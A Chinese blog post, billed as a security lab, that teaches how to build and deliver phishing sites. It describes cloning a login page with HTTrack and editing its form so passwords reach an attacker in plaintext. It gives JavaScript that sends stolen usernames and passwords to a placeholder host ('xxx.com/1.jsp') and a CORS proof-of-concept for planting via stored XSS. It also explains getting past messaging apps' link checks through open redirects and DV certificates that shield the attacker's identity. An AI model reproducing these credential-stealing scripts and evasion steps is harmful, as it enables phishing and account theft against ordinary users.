网络安全实验之钓鱼网站的制作及技巧

最新推荐文章于 2025-04-05 01:03:41 发布
最新推荐文章于 2025-04-05 01:03:41 发布
阅读量1.1k 收藏 11
点赞数 30
文章标签: 网络 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuwenshequ/article/details/145116719
版权

在红队攻击中,除漏洞以外最简洁高效的攻击方式无疑是钓鱼攻击,通过不同的钓鱼方式可达到不同的攻击效果,本次我会分享最常见的钓鱼手段之一的网站钓鱼技术,同时对可实现的攻击操作进行演示。

更多网站钓鱼实验科普,可前往无问社区查看icon-default.png?t=O83Ahttp://www.wwlib.cn

本次我们会分为以下2个实验环节进行讲解,让各位了解钓鱼网站的克隆及克隆网页常见问题解决方式,以及钓鱼网站能通过哪些安全漏洞进行攻击和如何通过安全工具的URL审查:

  1. 钓鱼网站的制作及利用场景
  2. 通过安全检查的方式

一 钓鱼网站的制作及投递

作为网站钓鱼的先前步骤,制作钓鱼网站必然是最基本的一步,推荐使用的工具为HttTrack,他是一款免费的网站克隆工具,特点在于速度快且克隆的效果与原始网站相似度高。

以下是工具克隆效果,第一张图是克隆页面第二张图是原始网站,能看出相似度很高。

之后便是如何通过此页面获取用户的账号密码,关键点在于能够将请求包发送至我们指定的密码接收端,同时还需要保证数据包格式能被我们自定义,这里我们可以根据页面结构的特点从以下两种方式进行选择或者组合使用。

  1. 直接修改form表单的action指向链接。
  2. 创建js事件捕获用户输入内容,并将用户名密码发送至接收端。

以我们所创建的这个页面为例来进行演示。

在原始文件中,并没有看到action属性,但是在底部能看到请求包发送的js代码,程序会将用户名密码信息发送至/User/executeLogin路径下。

修改请求地址,抓包分析请求内容。

密码做了加密,说明当前的登录按钮绑定了事件,点击时加密密码并发送。

Js绑定事件依赖两种方式,标签属性绑定以及标签名称绑定,通常情况下都是采用的标签属性绑定,通过测试发现,删除lay-submit属性后密码将变为明文。

最后这个页面修改位置如下图所示:

我们也可以通过绑定新的js代码,将用户名密码发送至我们的接收端,示例代码如下:

 1. document.getElementById('hacker').addEventListener('click', function() {
 2.   var passwd = document.getElementsByName('passwd')[0].value;
 3.   var user = document.getElementsByName('user')[0].value;
 4.   
 5.   var xhr = new XMLHttpRequest();
 6.   xhr.open('POST', 'xxx.com/1.jsp', true);
 7.   xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
 8.   xhr.send('passwd=' + passwd + '&user=' + user);
 9. });  

钓鱼网站最常用到的漏洞是XSS、跨域(CORS)、任意URL重定向这三类漏洞。

反射型XSS漏洞可以通过直接向目标发送带有重定向xss代码的漏洞链接,使其跳转到我们伪造的钓鱼网站上,也可以外部引入js代码来重写页面属性使其正常请求发送至我们的账户数据接收端。

存储型XSS漏洞除了可以使用反射型XSS漏洞所支持的攻击手段外,还可以进行CORS攻击,如我们的目标网站存在跨域漏洞,则可以将跨域漏洞利用代码写入网页当中,持续获取用户敏感信息。

CORS漏洞需要搭配其他漏洞使用。

任意URL重定向可以让目标访问到我们构造的恶意网站中

需要注意的是上述除CORS漏洞以外并非只能是目标站点存在,也可以是任何第三方网站,下面主要演示一下CORS漏洞的利用效果,POC利用代码可以结合XSS漏洞插入到目标网站的任意位置,实现同域下的账号敏感信息获取。

利用前需要注意验证CORS漏洞是否存在

Poc利用代码,自行修改:

 1. <script type="text/javascript">
 2.         var xhr = new XMLHttpRequest();
 3.         xhr.open('GET', 'http://xxx.com/test.php', true);
 4.         xhr.withCredentials = true; 
 5.         xhr.onreadystatechange = function() {
 6.           if (xhr.readyState === 4 && xhr.status === 200) {
 7.             var response = xhr.responseText;
 8.             alert(response);
 9.           }
10.         };
11.         xhr.send();
12.  
13.     </script>
14.  

可将其通过存储型XSS写入到任意页面当中去,下图是我本地测试页面,实际攻击中可以使用<scrtip src=’xxx.com/xx.jsp’></script>进行引用。

当用户访问到我们构建的钓鱼页面后,即可获取用户账户信息。

二 通过安全检查的方式

通过安全检查有两种方案可以尝试,第一种是通过重定向,最为方便且效果较好,第二种则是申请https证书。

我们在QQ或者钉钉以及其他的社交平台中发送链接时,通信软件会对目标链接安全性进行检测,对于个人注册的网站且未设置https证书,其会给出,“安全性未知”或者问号标记,如网站有违规行为则还可能会给出危险提示。此时如果将网站追加到合法网站的重定向参数中即可绕过检测,为我们的钓鱼链接给出“安全网站”的提示。

而第二种申请SSL证书,我们可以通过申请DV SSL证书来实现对钓鱼网站的https处理,目前支持DV SSL证书的平台较多,其优势在于验证流程简单,无需验证所有者身份,所欲对于攻击者的个人保护较好。

无问社区
关注
[网络安全自学篇] 六十九.宏安全之入门基础、防御措施、自发邮件及宏样本分析
杨秀璋的专栏
04-21 9420
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了利用永恒之蓝漏洞加载WannaCry勒索病毒,实现对Win7文件加密的过程,并讲解WannaCry勒索病毒的原理。这篇文章将讲解宏病毒相关知识,它仍然活跃于各个APT攻击样本中,本文包括宏病毒基础原理、防御措施、自发邮件及APT28样本分析。基础性文章,希望对您有所帮助。
[网络安全自学篇] 二十一.GeekPwn 2019极客大赛之安全攻防技术总结及ShowTime
杨秀璋的专栏
11-04 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。这篇文章主要分享作者10月24日参加上海GeekPwn极客大赛的体会,包括各种安全技术、ShowTime及疑惑。作者尽量还原当时的现场情景,以观众第一视角,带着网络安全初学者的无数疑问,并查询资料分享一些技术点。写这篇文章不容易,花费了两部手机电量,许多笔记、照片和资料完成,希望您喜欢,不喜勿喷~
kali 克隆网站制作钓鱼网站
Dhc15638305698的博客
11-08 1569
制作简单钓鱼网站
用Python Django搭建简单一个steam钓鱼网站,只要免费领游戏,一钓一个准
Python案例分享,B站视频教程:https://space.bilibili.com/523606542
11-22 1万+
前言 我们日常上网的时候,总是会碰到一些盗号的网站,或者是别人发一些链接给你,里面的内容是一些可以免费购物网站的优惠券、游戏官网上可以免费领取皮肤、打折的游戏。 这些盗号网站统一的目的都是要你登录账号输入密码,点击登录,不过就是永远会提示你密码错误,登录不上。但你输入的所有信息,都会出现在别人的电脑上 这些网站盗号网站之所以能骗得过别人,是因为做得基本和正版的官方网站没有什么差别。不能说毫无差别,只能说是一模一样 而今天,我们的目的就是搭建一个这样的网站后端,简单的还原一下你被盗号的过程 主页左侧可以免
利用kali制作一个钓鱼网站
最新发布
wrjhs的博客
04-05 410
但有一些网站的站点是不能克隆的,如果网站做了防钓鱼的防护的话,我们就克隆不了。看完整个教程后发现,制作一个钓鱼网站并不困难,所以所以我们平常在访问一些常用的有账号登陆的地方一定要看清楚url,防止被钓鱼。如果想要外网也能访问到我们本地的钓鱼网站,我们就要进行内网穿透,内网穿透需要用到一些工具,会在后面的文章中更详细的讲到。完成后,我们来进行严重,在浏览器中输入我们的IP address进入钓鱼网站,并输入账号和密码。接下来要进行一些参数的设置,这里的IP address是我们kali的IP地址。
制作一个简单的钓鱼网站
weixin_30745553的博客
07-12 8200
制作一个简单的钓鱼网站 实验环境:一台kali虚拟机(用作制作钓鱼网站),NAT模式上网。 一台物理机(就是我的电脑,用作被攻击对象) 首先在kali上打开要使用的工具setoolkit. 接着有6个选项,选择第一个社会工程攻击. 选择社会工程攻击之后接着有11个选项. 选择第二个网站攻击向量. 选择完之后有8个选项。 选择第三个凭证收割攻击方法. 选择完之后有3个选项。 第一个选项是使用...
第一次尝试制作一个钓鱼网站,小白教程,超细!
qq_46089119的博客
02-05 2万+
钓鱼网站制作
简单的钓鱼网站制作
qq_45906009的博客
06-23 6054
今天早上闲来无事,在地铁上,想到学习一下钓鱼网站制作,于是到公司就准备实操一下。于是乎 这篇文章诞生了 首先我们需要一台kali。 打开Social Engineering Tools 1.社会工程学攻击 2.快速追踪测试 3.第三方模块 4.升级软件 5.升级配置 6.帮助 我们选择第一个社会工程学攻击 1.鱼叉式网络攻击 2.网页攻击 3.传染媒介式 4.建立payload和generator 5.群发邮件攻击 6.Arduion 基础攻击 7.无线接入攻击 8.二维码攻击 9.powershe
用kali制作一个简单的钓鱼网站
hovcfuti的博客
07-20 4734
钓鱼网站上输入的用户名和密码会直接显示到kali中,成功得到受害者的账号,这里我没有账号随便输入一个,如果输入的账号是正确的话会直接转跳到真正的网站中,直接无色无味。这时候直接访问自己kali虚拟机的IP,就会访问到一个假的网站,有些小瑕疵哈哈哈,不重要,主要是学习。这时候就可以选择攻击类型,这里我们想要制作一个简单的钓鱼网站,输入1,选择社会工程攻击,回车。输入2,选择网站攻击,回车(英语不好,都靠翻译软件,有些不准确)这时候在生成的钓鱼网站中登录,kali机会监听到一些有趣的东西。
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
网络安全 | 社会工程学:黑客如何利用人性攻击网络
热门推荐
CSDN博客专家,系统架构师,有合作、疑惑请私信博主。
01-04 6万+
网络安全 | 社会工程学:黑客如何利用人性攻击网络, 本文深入探讨了社会工程学在网络安全领域中的应用,详细阐述了黑客如何利用人性的弱点来实施网络攻击。通过对社会工程学的基本概念、常见攻击手段如网络钓鱼、伪装欺骗、诱饵攻击等进行剖析,并结合实际案例展示其危害,进而提出了一系列针对社会工程学攻击的防范措施,旨在提高个人、企业和组织对社会工程学攻击的认知和防范能力,维护网络安全环境。
网络钓鱼网站检测:使用神经网络检测网络钓鱼网站实验
02-04
网络钓鱼网站检测:使用神经网络检测网络钓鱼网站实验
网络安全.渗透测试】Cobalt strike(CS)工具使用说明
xinyaoyaotu的博客
02-09 1666
网络安全技术不断发展的当下,渗透测试作为保障网络安全的关键环节,其重要性愈发凸显。Cobalt Strike(简称 CS)这款专业级的渗透测试工具,凭借强大的功能和出色的性能,成为众多安全测试人员的得力助手。它不仅能帮助安全人员高效地检测系统安全漏洞,还能为网络安全状况评估提供有力支持。今天,就让我们一同深入了解 CS 工具的使用方法。CS 工具为渗透测试工作带来了极大的便利,但我们也要明确,任何技术工具都应在合法合规的框架内使用。
简单的制作一个钓鱼网页!
专注前端技术,包括Web端、移动端、小程序、APP
02-15 2万+
网络钓鱼,一个价值很高的词语!如果你曾读过我的一篇文章《价值30亿美元的资料被窃取,网络钓鱼到底有多可怕!》就会知道,网络钓鱼到底有多"值钱"! 如果对网络钓鱼这个词进行解释的话,简而言之,其就是一种黑客手段,或者是一种通过假装自己是受信任的实体来欺骗他人来获取凭据(账号、密码等信息)的方法。 讲白话,都能听懂的就是去仿作一个和正规网站一样的登录页面,欺骗用户进行输入从而达到获取信息的目的! ...
制作钓鱼网站(克隆网站
墨痕诉清风的博客
01-24 2万+
克隆网站
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 2222
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
简单的钓鱼网站制作
Culprit的博客
01-30 2万+
制作环境: Kali 制作步骤: 1.打开软件,选择第一项社会工程攻击 2.选择2 Website Attack Vectors 3.选择3Credential Harvester Attack Method 4.选择2.网站克隆 5.输入你kali的ip地址 6.输入要克隆的网站的url或者ip 7.接下来便是等待上钩 8当别人输
钓鱼网站制作Kali
weixin_39881865的博客
09-23 2893
https://www.bilibili.com/video/av31131550?from=search&amp;seid=11277523877543782194
kali制作一个简单的钓鱼网站
guetstudents的博客
11-24 987
然后选择3.Credential Harvester Attack Method攻击模块,选择2克隆网站。打开自已的kali,进入首先进入root模式,开启setoolkit模块。当我们输入账号密码登录后,会回显到正确的网站地址。我们选择1,社会工程学攻击,后面还会出现选项。4、建立payload和listener。即出现自已克隆的网站,kali显示上线。这里我们选择2,网页攻击,出现。9、Powershell攻击。6、Arduino基础攻击。输入自已想克隆的网站,回车。
SQL注入与钓鱼网站实验
01-08
### SQL注入与钓鱼网站安全测试学习教程 #### 关于SQL注入实验 对于希望深入了解并实践SQL注入防护的新手而言,可以在需要防范注入的页面头部加入特定代码来阻止他人进行手动注入尝试[^1]。通常情况下,这涉及编写或引入一段能够过滤和验证输入数据合法性的脚本。 例如,在PHP环境中可以采用如下方式预防基本类型的SQL注入攻击: ```php <?php // 假设 $input 是来自用户的未经处理的数据 $input = $_GET['user_input']; // 使用PDO预处理语句绑定参数以防止SQL注入 $pdo = new PDO('mysql:host=localhost;dbname=test', 'username', 'password'); $stmt = $pdo->prepare('SELECT * FROM users WHERE username=:name LIMIT 1'); $stmt->execute(['name' => $input]); $user = $stmt->fetch(); ?> ``` 这段代码展示了如何通过准备好的陈述(prepared statement)机制有效抵御大多数形式的传统SQL注入威胁。 #### 钓鱼网站安全测试 针对钓鱼网站的研究,则更多集中在识别其特征以及教育用户提高警惕方面。这类活动应当遵循法律框架内允许的方式来进行模拟演练,比如创建受控环境下的假站点用于内部培训目的,而不是实际部署恶意服务去欺骗公众。 具体操作上可以通过设置一个仅限授权人员访问的教学平台,其中包含了精心设计的情景案例供学员练习辨别真假网址链接、检查SSL证书状态等技能。同时配合理论课程讲解常见的社会工程学手法及其应对策略[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值